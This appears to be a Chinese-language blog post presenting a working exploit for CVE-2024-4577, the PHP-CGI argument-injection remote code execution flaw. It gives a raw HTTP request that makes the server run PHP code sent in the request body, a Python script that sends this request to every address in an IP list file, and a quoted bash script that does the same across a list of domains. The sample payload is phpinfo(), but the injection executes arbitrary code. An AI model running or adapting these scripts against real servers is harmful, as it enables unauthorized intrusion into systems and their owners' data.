[CVE-2024-4577] php CGI RCE漏洞python POC

參考:https://www.ddosi.org/cve-2024-4577/
http包👇

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 21
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

---

編寫exp.py👇

'''
EXP 
of
PHP RCE CVE-2024-4577
'''
if __name__=='__main__':
    print('我開始啦')
import requests 
import re
import json
###############👇
path=r"D:\phpstudy_pro\WWW\UPLOAD\py\CVE-2024-4577\IP-list.txt" #地址列表檔案位置
###############👆
#pattern = r'\{.*\}'
pattern = r"<h1 class=\"p\">PHP Version"
#初始化地址列表

def addstr(url):
    url_tail=r'/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
    def add_http_header(url):
        if not url.startswith('http://'):
            url = 'http://' + url
        return url
    def delxiegang(url):
        if url.endswith('/'):
            url=url[:-1]
        return url
    def addxiegang(url):
        if not url.endswith('/'):
            url =url+'/'
        return url
    http_url= add_http_header(url)
    final_url=delxiegang(http_url)+url_tail
    return final_url

address_list=[]
#讀取地址列表👇
with open(path,'r',encoding='utf-8') as file:
    for line in file:
        address_list.append(addstr(line.replace("\n", "")))

print(address_list)
def send_poc(url):
    url=url
    headers = {
        "User-Agent": "curl/8.3.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "keep-alive"
    }
    data = "<?php phpinfo(); ?>"
    try:
        response = requests.post(url, headers=headers, data=data)
        response.encoding='utf-8'
        response_text=response.text
        matches = re.findall(pattern, response_text)
        if matches:
            print("#利用成功!!!!!!!!!!!!!!!!!!!,url:", url)
        else:
            print("@未找到匹配項。", url)
    except:
        print("@發生了一個錯誤", url)
        pass
    
    #傳送poc👆
    #print(response.text)

    #check php_info👇
for address_url in address_list:
    send_poc(address_url)

我寫完這個py指令碼才發現github上已經有人寫了bash指令碼,思路差不多一樣👇
https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.sh

#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
    local domain=$1
    local response=$(curl -s -X POST "${domain}/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
        -H "User-Agent: curl/8.3.0" \
        -H "Accept: */*" \
        -H "Content-Length: 23" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Connection: keep-alive" \
        --data "<?php phpinfo(); ?>" \
        --max-time 10)

    if [[ $response == *"PHP Version"* ]]; then
        echo "$domain: Vulnerable"
    fi
}

# Main function to iterate over domains
main() {
    local file=$1
    while IFS= read -r domain || [ -n "$domain" ]; do
        check_vulnerability "$domain"
    done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <domain_list_file>"
    exit 1
fi

# Call the main function with the domain list file
main "$1"

正則和他的萬用字元匹配的字串都一樣,挺巧的.